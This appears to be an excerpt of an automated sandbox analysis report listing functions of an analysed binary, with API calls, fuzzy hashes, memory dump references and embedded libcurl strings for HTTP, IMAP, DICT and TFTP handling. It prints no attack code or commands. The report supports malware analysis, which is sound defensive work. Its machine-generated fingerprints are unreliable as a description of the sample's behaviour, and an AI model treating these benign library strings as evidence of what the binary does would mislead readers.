    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    • Opcode ID: caccf67daf3e32c7e8088754bc839c1849c64c1d39a80c19f4ad612b443d27bf
    • Instruction ID: b4cdc3797f1893526e8a1ad5e746a874581197659877e4be3667cf39a735f3b6
    • Opcode Fuzzy Hash: caccf67daf3e32c7e8088754bc839c1849c64c1d39a80c19f4ad612b443d27bf
    • Instruction Fuzzy Hash: 2E11253A2003069FDF189F3AC8A19BABB97FF84718B15442DE94787B40D771B802CB40
    Function 006E2D08 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,006E2AA5,00000000,00000000,?), ref: 006E2D34
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$InfoLocale
    • String ID:
    • API String ID: 3736152602-0
    • Opcode ID: f2a9f02e7a31c5ecc3f3fb8275e36216a97dd99b3c3f86a3fe4831d5de945bca
    • Instruction ID: f19570a5962c4ac24ce87d6906e527d696877d0eeeecd784c096155e4dc29c2c
    • Opcode Fuzzy Hash: f2a9f02e7a31c5ecc3f3fb8275e36216a97dd99b3c3f86a3fe4831d5de945bca
    • Instruction Fuzzy Hash: CBF0D6325117566FDB2496228C56AFA775FEF40754F150429EE16A32C0DA74FD02C5D0
    Function 006E27FE Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • EnumSystemLocalesW.KERNEL32(006E2ADC,00000001,?,?,-00000050,?,006E2E7B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 006E2848
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    • Opcode ID: ee966fa92c046a4db025e4f7dfc9817b80297ea7c2afc220ebb903f2ab4e36f7
    • Instruction ID: b2d4127a4f1c77a4ba82f2f74cc69f8f5d8fb2184b7814cfd634136116e6cebc
    • Opcode Fuzzy Hash: ee966fa92c046a4db025e4f7dfc9817b80297ea7c2afc220ebb903f2ab4e36f7
    • Instruction Fuzzy Hash: 00F0463220034A1FDB245F3A9C91ABB7B9BEF81328F05803EF90A4B680C6719C42CB50
    Function 006DB041 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D30A1: EnterCriticalSection.KERNEL32(?,?,006D376B,00000000,006FA9D0,0000000C,006D3732,006BD8C4,?,006DB00A,006BD8C4,?,006D8F03,00000001,00000364,00000006), ref: 006D30B0
    • EnumSystemLocalesW.KERNEL32(006DB034,00000001,006FAC70,0000000C,006DB49F,00000000), ref: 006DB079
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CriticalEnterEnumLocalesSectionSystem
    • String ID:
    • API String ID: 1272433827-0
    • Opcode ID: 059e1cac58ab1cf60cf52bc7bd9145d6e6fda79632ad23737a3d8432c02b5363
    • Instruction ID: ad215ee4c2ed36b8f739630030b93f0ecc5800303c84c156f11ae5ac7976d5d6
    • Opcode Fuzzy Hash: 059e1cac58ab1cf60cf52bc7bd9145d6e6fda79632ad23737a3d8432c02b5363
    • Instruction Fuzzy Hash: C5F04972A00215DFDB10EF98E842B9D77B1EB45721F10815BF914DB3A1CBB98A408B89
    Function 006E2718 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
    Download Yara Rule
    APIs
      • Part of subcall function 006D8D61: GetLastError.KERNEL32(006FA414,?,?,006D2BC1,?,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8D66
      • Part of subcall function 006D8D61: SetLastError.KERNEL32(00000000,00000006,000000FF,?,006BD916,?,?,?,?,?,?,?,006FA414,?), ref: 006D8E04
    • EnumSystemLocalesW.KERNEL32(006E2671,00000001,?,?,?,006E2ED9,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006E274F
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$EnumLocalesSystem
    • String ID:
    • API String ID: 2417226690-0
    • Opcode ID: 5ed7d18a37c74bbe0f8471b7a1c425ea397d45e526344fd8b63c85750cc24415
    • Instruction ID: d0ff1cf8b3f51ed44663c8cb3db67e50d6d74a3ff5765073f39012e178da2543
    • Opcode Fuzzy Hash: 5ed7d18a37c74bbe0f8471b7a1c425ea397d45e526344fd8b63c85750cc24415
    • Instruction Fuzzy Hash: 57F0E53A30034A5BCF14AF36D8556AABF9BEFC2754B1A405AEE098B691C6719843C790
    Function 006DB5A3 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006D5BB5,?,20001004,00000000,00000002,?,?,006D51A0), ref: 006DB5D7
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: InfoLocale
    • String ID:
    • API String ID: 2299586839-0
    • Opcode ID: 14eccdd6c46728979b44a857b6fe30cf5c700dc2613eaf06e11ab451c1a0df94
    • Instruction ID: bb922aee35ae55ee07d1c2870aba9790ff390836b3670159638378164cd57c81
    • Opcode Fuzzy Hash: 14eccdd6c46728979b44a857b6fe30cf5c700dc2613eaf06e11ab451c1a0df94
    • Instruction Fuzzy Hash: 4EE01A31900268FFCF122F61EC05AAE3F27EF84B50F055016F9056A3658F728A21AAD4
    Function 006BA360 Relevance: 1.5, APIs: 1, Instructions: 20encryptionCOMMON
    Download Yara Rule
    APIs
    • CryptHashData.ADVAPI32(?,?,006BA29D,00000000,?,?,006BA29D,?,?,00000000,?,?,006B35B3,?,00000000,?), ref: 006BA377
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CryptDataFailureHash
    • String ID:
    • API String ID: 3512970722-0
    • Opcode ID: 658a094db32bd8dc89f931d88c3fbd0d53856fa341ba52a94d0293aad097886a
    • Instruction ID: 9fc4cc1d78c72e16fc162204d46513fb8c3edad450169fbfb5d8a7b0b441d3ec
    • Opcode Fuzzy Hash: 658a094db32bd8dc89f931d88c3fbd0d53856fa341ba52a94d0293aad097886a
    • Instruction Fuzzy Hash: 0DD01272100218ABC744EB9CEC82E9A779DAB0A220F454114F91C9B241C671D98087E5
    Function 006DD743 Relevance: .0, Instructions: 29COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 46f999861097c4f13e540b774a397c3fcbd32cb031a13501e815355824a9751f
    • Instruction ID: cdcc90aa2c0244e8d72926533c0ddecb9ecfbf5cdc0fd07b8ca1182373d6a04c
    • Opcode Fuzzy Hash: 46f999861097c4f13e540b774a397c3fcbd32cb031a13501e815355824a9751f
    • Instruction Fuzzy Hash: EEF03972E11224EBCB26DB8CC805A9973A9EB45B65F1240AAE541EB351C7B4DE40C7C4
    Function 006DD787 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: da9e6bca82774ea64ae42dd25e6b3acd87546c7071bc047563dc2105fc4fb8b2
    • Instruction ID: 415867bf73bf9bee83a49cb42c31520dae8a4c451d4d3a94038a2e2bc80555dc
    • Opcode Fuzzy Hash: da9e6bca82774ea64ae42dd25e6b3acd87546c7071bc047563dc2105fc4fb8b2
    • Instruction Fuzzy Hash: 69E04632911228EBCB15EB888A0498AB2EDEB45B40B16009AB501D3240C270DE00CBD4
    Function 00670E00 Relevance: 49.4, APIs: 11, Strings: 17, Instructions: 384COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 00670F5B
    • ___from_strstr_to_strchr.LIBCMT ref: 00670F78
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr
    • String ID: %s$Authorization:$Authorization:$Connection:$Connection:$Content-Length:$Content-Length:$Content-Type:$Content-Type:$Content-Type:$Content-Type:$Cookie:$Cookie:$Host:$Host:$Transfer-Encoding:$Transfer-Encoding:
    • API String ID: 601868998-3913864794
    • Opcode ID: 1aa0d6baae6184d91cb1c5b2e3153695c13b4dbd087cb19588dc20f0c25f2c62
    • Instruction ID: ade8773757c192598806ae02428ecae917cac082bb91ed420432f690c72e3c56
    • Opcode Fuzzy Hash: 1aa0d6baae6184d91cb1c5b2e3153695c13b4dbd087cb19588dc20f0c25f2c62
    • Instruction Fuzzy Hash: 03E16EB0E00209DFDB14DF98D855BEEB7B7AF45304F14816AE909AB342D7359E81CBA1
    Function 00687B30 Relevance: 42.4, APIs: 8, Strings: 16, Instructions: 367COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 00687BE1
    • ___from_strstr_to_strchr.LIBCMT ref: 00687C01
    • ___from_strstr_to_strchr.LIBCMT ref: 00687C27
    • ___from_strstr_to_strchr.LIBCMT ref: 00687C4D
    • ___from_strstr_to_strchr.LIBCMT ref: 00687DA0
    • ___from_strstr_to_strchr.LIBCMT ref: 00687DC0
    • ___from_strstr_to_strchr.LIBCMT ref: 00687DE6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr
    • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$0!p$8!p$CLIENT libcurl 7.67.1-DEV%sQUIT$CLIENT libcurl 7.67.1-DEVDEFINE %s %sQUIT$CLIENT libcurl 7.67.1-DEVMATCH %s %s %sQUIT$Failed sending DICT request$Failed sending DICT request$Failed sending DICT request$lookup word is missing$lookup word is missing
    • API String ID: 601868998-1830074969
    • Opcode ID: 15da66ce73d0b78cb5439f527a77e23d5c0ffd740924afa1775789c4271e4e13
    • Instruction ID: 10797bc08203f16de1f4d078fc5ecd74c33dd1d6ba3f940d2c14540e81f03f1e
    • Opcode Fuzzy Hash: 15da66ce73d0b78cb5439f527a77e23d5c0ffd740924afa1775789c4271e4e13
    • Instruction Fuzzy Hash: EBE172B1E04209EBDB14EBA4CC95BFEB7B2AF49304F244658E5107B382D775DA41CBA1
    Function 00690D90 Relevance: 37.1, APIs: 6, Strings: 15, Instructions: 306COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _memcmp$_strlen
    • String ID: CAPABILITY$EXAMINE$EXPUNGE$FETCH$FETCH$LIST$LSUB$NOOP$PREAUTH$SEARCH$SEARCH$SELECT$STORE$UID$Unexpected continuation response
    • API String ID: 2507548353-343963993
    • Opcode ID: f3c40d9a998a07b5f1a7a09d79b3c92e33d534c76efbfd2bfbbf76861303e4c4
    • Instruction ID: 612623cf1719056bc77a0757198d60377165f4715f19fee1451c18c39e2a3739
    • Opcode Fuzzy Hash: f3c40d9a998a07b5f1a7a09d79b3c92e33d534c76efbfd2bfbbf76861303e4c4
    • Instruction Fuzzy Hash: D0B17CB4A00206EFDF14CF54D882ABA73BBBF46305F24855CE9149B782E736DA41CB91
    Function 00689400 Relevance: 35.3, APIs: 10, Strings: 10, Instructions: 330networkCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast_strlensend$CheckStackVars@8
    • String ID: %127[^,],%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%c%c%c%s%c%c$%c%s%c%s$'$Sending data failed (%d)$Sending data failed (%d)$Sending data failed (%d)
    • API String ID: 1858286298-4223198724
    • Opcode ID: a9ae17e86cf13ccd84f3f1dc5d31d5a7f7e1a56f02e8b7447479c11ce5319e94
    • Instruction ID: 22b0733f8d6beb6d8a4732b879f9bda5170baeb9afb61c6436e8109a44af84a8
    • Opcode Fuzzy Hash: a9ae17e86cf13ccd84f3f1dc5d31d5a7f7e1a56f02e8b7447479c11ce5319e94
    • Instruction Fuzzy Hash: D6D150B19412189BEB64DB54CC92FE973BAFF84700F0482E8E5496B282DA755E81CFD4
    Function 0068CE40 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 199COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 0068CEE2
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068D0AD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %s (%d)$%s (%d)$%s (%d) %s (%d)$%s (%ld)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
    • API String ID: 1951014933-1815295340
    • Opcode ID: 0d5b1fc1df6f1a5d6865e896a3eb359d00b2cfc5c17f723e48167cd2ff843b78
    • Instruction ID: 5c069d9ea4b36b6ac7f5fc5a379f86e01580098aafd2feabcbd6b8aa9799bdcf
    • Opcode Fuzzy Hash: 0d5b1fc1df6f1a5d6865e896a3eb359d00b2cfc5c17f723e48167cd2ff843b78
    • Instruction Fuzzy Hash: 836184F6E00204EBDB00EF94CC55FEE77B6AB88304F144658F9047B382D679AA42C7A5
    Function 00678710 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 192COMMON
    Download Yara Rule
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678764
    • __allrem.LIBCMT ref: 006787A3
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006787B1
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006787C7
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678806
    • __allrem.LIBCMT ref: 00678842
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678850
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678866
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006788A5
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006788E1
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0067890C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem
    • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
    • API String ID: 632788072-2102732564
    • Opcode ID: 3a2bb7a5e69e96b69d4b94e2ad48dc8eacaedffb4792735a337398dd1057da39
    • Instruction ID: ef5f134673cc5f2e031df6e77fbb794b316756e7115c79e75202298fcf6519bb
    • Opcode Fuzzy Hash: 3a2bb7a5e69e96b69d4b94e2ad48dc8eacaedffb4792735a337398dd1057da39
    • Instruction Fuzzy Hash: BB5164F5680204BFEB54DF58CC56FAB33AAAB44750F10C51CBB1DAB181CA75ED408B6A
    Function 006B2FF0 Relevance: 30.1, APIs: 1, Strings: 16, Instructions: 301COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 006B1A90: @_RTC_CheckStackVars@8.LIBCMT ref: 006B1CA7
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B332C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: $ RSA Public Key (%lu bits)$%lu$RSA Public Key$dh(g)$dh(p)$dh(pub_key)$dhpublicnumber$dsa$dsa(g)$dsa(p)$dsa(pub_key)$dsa(q)$rsa(e)$rsa(n)$rsaEncryption
    • API String ID: 930174750-1956809659
    • Opcode ID: d7b7e558c0a2936968ab70aa7d8809ee91ef4bee301c08de5877b5baa8508a9f
    • Instruction ID: c729da01b73ebbc07c0e0f1cb734682a63d95435a3772b28b6c98beec5af0395
    • Opcode Fuzzy Hash: d7b7e558c0a2936968ab70aa7d8809ee91ef4bee301c08de5877b5baa8508a9f
    • Instruction Fuzzy Hash: 0BB121F5A00109EBCB44DF94DD91DEE77BAAF48340F548518F905AB341EA31EE84CBA5
    Function 00678E40 Relevance: 28.5, APIs: 13, Strings: 3, Instructions: 493COMMON
    Download Yara Rule
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678EB5
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678FB5
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00679007
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0067901F
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00679082
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006790F2
